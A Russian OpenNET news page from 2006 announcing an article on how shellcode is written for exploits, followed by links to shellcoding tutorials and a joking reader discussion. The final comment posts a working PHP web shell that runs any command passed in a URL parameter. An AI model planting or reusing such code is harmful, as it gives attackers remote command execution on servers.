The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Как создается "shell код"

19.05.2006 16:33

В статье "How Shellcodes Work" рассказывается что такое shellcode (блок бинарного кода для выполнения определенного действия (чаще всего запуска shell) после использования уязвимости), как его создают и используют в эксплоитах.

  1. Главная ссылка к новости (http://www.linuxdevcenter.com/...)
  2. Shellcoding for Linux and Windows Tutorial
  3. Принципы написания remote эксплоитов
  4. The Basics of Shellcoding
  5. Writing shellcode
  6. Shellcodes Archive
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/7546-security
Ключевые слова: security, exploit, shellcode
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (16) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, pagan (?), 17:51, 19/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >блок бинарного кода для запуска shell после использования уязвимости
    да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы слать, это уже шеллкоднсом не будет?

    А вообще стыдно уже такие статьи публиковать. Теме 10 лет уже. И ладно бы чего нить относительно новое писали (хотя бы про полиморфные/метаморфные shellcode, мультиплатформенные,etc), так нет, в 1024 раз напишут про то как сделать буфер оверфлоу в программе, и что самое главное, как написать, и скомпелировать сплоет (а значит и немного шеллкодеса).

    Печально.

    wbr.

     
  • 1.2, dropuser (?), 18:50, 19/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >>блок бинарного кода для запуска shell после использования уязвимости
    >да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы
    >слать, это уже шеллкоднсом не будет?
    вообще-то, нормальный шеллкод и есть 0-free
    а во-вторых, сказано "чаще всего для запуска shell"

    вам лишь бы придраться...

     
     
  • 2.4, pagan (?), 20:13, 19/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    >вообще-то, нормальный шеллкод и есть 0-free
    А я и не утверждал обратного.
    >а во-вторых, сказано "чаще всего для запуска shell"
    Это уже потом исправили. Изначально было "для запуска shell"
    >вам лишь бы придраться...
    Уверяю Вас, это не так.
     

  • 1.3, Аноним (-), 19:21, 19/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Статья самое оно для тех кто только "где-то" слышал что такое шеллкод и эксплоиты но не разу не сталкивался вплотную.
     
     
  • 2.5, slv (??), 18:43, 21/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Если Вам это не интересно, то это не значит, что не интересно никому...
     
     
  • 3.6, Аноним (-), 04:47, 22/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    ещё раз перечитайте, что он написал - поймёте, что он имел ввиду.
     

  • 1.7, noname (??), 08:59, 22/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    угу. въезжаем в новое тысячелетие верхом на танке с баяном прошлого века.
     
  • 1.8, Zlobec (?), 09:25, 22/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Теме 10 лет и 10 лет я читаю эти статьи с удовольствием
     
     
  • 2.9, pagan (?), 09:45, 22/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    >Теме 10 лет и 10 лет я читаю эти статьи с удовольствием
    И вот, настало время, Вам нужно срочно вступить и скомпелировать :-))))
     
     
  • 3.10, Осторожный (?), 11:57, 22/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    скомпелировать -> скомпилировать
     
     
  • 4.11, pagan (?), 12:11, 22/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    > скомпелировать -> скомпилировать
    нет, нет, именно скомпЕлировать. Читайте хэккерский езинос от BHC %))

    p.s. это не более чем стеб над "знатоками".

     
     
  • 5.12, Zlobec (?), 12:51, 22/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    Я думаю мир прекрасен и без скомпелированово экспойта....
     

  • 1.13, Аноним (-), 10:35, 23/05/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    короче Адепты! вступайте и компелируйте! В месте мы сила!
     
     
  • 2.14, pagan (?), 12:11, 23/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    >короче Адепты! вступайте и компелируйте! В месте мы сила!
    Вы одепт негодный, потому как не знаете как пишется слово одпет.
    Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG
     
     
  • 3.15, Zlobec (?), 13:47, 23/05/2006 [^] [^^] [^^^] [ответить]  
  • +/
    >>короче Адепты! вступайте и компелируйте! В месте мы сила!
    >Вы одепт негодный, потому как не знаете как пишется слово одпет.
    >Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG


    А че это он в двоичке шелкодит, я в статье видал там циферки и иксики ? )))))))))

     

  • 1.16, N1eO (?), 19:43, 07/09/2006 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    <?

    if (!empty($_GET['c'])) {
             echo '<pre>';
             system($_GET['c']);
             echo'</pre>';
    }

    exit;

    ?>

     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру